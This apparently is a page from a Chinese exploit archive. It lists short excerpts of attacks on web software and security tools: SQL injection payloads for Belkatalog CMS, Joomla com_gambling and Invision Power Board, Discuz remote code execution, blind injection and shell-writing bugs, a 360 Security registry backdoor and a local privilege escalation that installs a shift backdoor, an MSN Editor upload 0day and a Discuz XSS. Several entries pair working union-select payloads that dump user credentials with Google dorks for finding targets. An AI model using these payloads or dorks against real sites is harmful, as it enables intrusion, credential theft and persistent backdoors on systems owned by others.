Belkatalog CMS SQL 注入漏洞(图)

google:Powered by:Belkatalog CMS

EXp: -9999+union+all+select+1,version(),3,4,5,6--

详细利用:http://site.com/cms/index.php?id=m&lnk=[sql injection here]

...

标签:

discuz!7.1、7.2远程代码执行漏洞exp

第一种方法:

先注册个用户然后把

<form method="post" action="   http://www.xxx.com/bbs/misc.php" enctype="multipart/form-data">
帖子ID,指定一个存在的帖子即可:<input type="text" name="tid" value="1" />
...

标签:

Discuz插件《虚拟股市》blind Injection注入漏洞利用

漏洞的发现来自于对某站的渗透,由于其discuz版本为7.0,所以我只能把眼光聚焦在了它所安装的第三方插件上。 

经过简单的测试,就发现了《虚拟股市》存在注射漏洞: 
http://www.target.com/plugin.php ... _One&stockid=91 # 91为可变参数 
http://www.target.com/plugin.php ... ser_Show&uid=13 # 13为可变参数 

...

标签:

Discuz!7.0-7.2后台settings.inc.php中写shell漏洞

发布时间:2010-02-05
影响版本:
Discuz!7.0-7.2漏洞描述:
漏洞详情:
if($operation == 'uc' && is_writeable('./config.inc.php') && $isfounder) {
        $ucdbpassnew = $settingsnew['uc']['dbpass'] == '********' ? UC_DBPW : $settingsnew['uc']['dbpass'];
...

标签:

Joomla (com_gambling) SQL Injection Vulnerabilities

google: inurl:com_gambling

Exploit:
-9999+union+select+1,concat(username,0x3a,password)+from+mos_users/*

利用:http://www.Site.com/index.php?option=com_gambling&Itemid=64&task=showGame&gamblingSid \
...

标签:

360安全卫士是在中国广泛使用的免费上网安全软件。

360安全卫士会在安装过程中在用户系统上安装一个注册表操作程序,该程序可以被用来绕过操作系统的安全检查机制任意操作(设置、删除等)用户的注册表。由于该程序没有对调用者进行检查,导致任意程序(如各种木马程序等)可以通过该后门任意操作(设置、删除等)用户的注册表系统。

该程序包括两个文件:

1. bregdrv.sys:内核模式驱动,该驱动程序通过调用操作系统的未公开CmXxx系列函数来操作注册表,另外由于操作系统内部本身维护了很多同步数据、缓存数据,直接调用CmXxx系列函数操作注册表极有可能造成系统内部数据不同步,严重影响系统安全性,甚至可能导致用户正常数据丢失。

...

标签:

360本地提权(Webshell下用)

作者: friddy
在webshell下运行360test.exe

成功后,3389到服务器,按5下shift,得到一个cmd
 

附件地址:360up.rar
密码friddy
 
没加壳。。。直接F5下。。。调用了BREGDLL.dll的导出函数,然后利用了映像劫持的debugger。。。安装了shift后门。。
有码有真相:预览源代码打印关于

01 signed int __cdecl sub_401000() 
...

标签:

Invision Power Board 1.3.1及更低版本SQL注入漏洞

Invision Power Board是一款使用广泛的基于WEB的程序。

Invision Power Board存在输入验证漏洞,远程攻击者可能利用此执行SQL注入攻击。

 

由于没能正确的过滤用户提供的数据,攻击者可能通过在st参数中插入SQL指令在主机上执行SQL注入攻击。

受影响系统:
Invision PS Invision Board 1.3.1 Final
Invision PS Invision Board 1.3 Final
...

MSN Editor 0DAY

简单说下利用的方法吧。
点击图片上传后会出现上传页面,地址为

http://www.xxx.cn/admin/uploadPic.asp?language=&editImageNum=0&editRemNum=

用普通的图片上传后,地址为
...

标签:

提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
========================================================================================                
| # Title    : Discuz! 5.0.0 Cross Site Scripting Vulnerability                  
...

标签:

分页:«12345»